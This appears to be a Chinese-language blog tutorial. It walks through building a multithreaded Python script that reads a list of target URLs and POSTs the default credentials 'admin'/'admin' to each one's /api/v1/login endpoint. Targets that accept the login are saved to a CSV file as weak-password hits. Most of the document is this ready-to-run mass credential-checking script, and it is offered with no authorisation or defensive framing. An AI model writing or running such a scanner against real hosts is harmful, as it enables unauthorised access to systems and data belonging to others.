目录
一、目标1:理清逻辑
模拟登录的基本流程
1、进入入口程序
2、读取目标URL
3、请求加上线程
4、确定请求数据包
5、请求格式的确认
6、数据的处理与判断
二、目标2:将每一步用代码进行表示
(顺序会进行标号)
对于不同的站点的登录
需要对数据包、请求格式、逻辑处理等进行适当的修改
admin_login.py
python
import csv
import requests
import threading
def admin_login(urls):
#④确定请求数据包
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79',
'Content-Type': 'application/json',
}
data = {
"accessKey": "admin",
"secretKey": "admin"
}
try:
#⑤请求格式的确认
res = requests.post(url=urls, headers=headers, json=data, timeout=60)
#⑥数据的处理与判断
if res.status_code == 204:
print(f"\033[32m[+]{urls} is 弱口令登录!\033[0m")
with open('ip_login.csv', mode='a', encoding='utf-8', newline='') as f:
csv_w = csv.writer(f)
csv_w.writerow([urls])
else:
print(f"\033[34m[-]{urls} pass.\033[0m")
except Exception as e:
print("错误为"+str(e))
#①进入入口程序
if __name__ == '__main__':
threads = []
#②读取目标URL
with open("ips.csv", mode="r") as f:
for u in f:
url = u.replace("\n", "")
urls = url + "/api/v1/login"
#③函数请求加上线程
thread = threading.Thread(target=admin_login, args=(urls,))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
三、网络安全O
GitHub - BLACKxZONE/Treasure_knowledge
https://github.com/BLACKxZONE/Treasure_knowledge
https://gitee.com/shubansheng/Treasure_knowledge/blob/master/README.md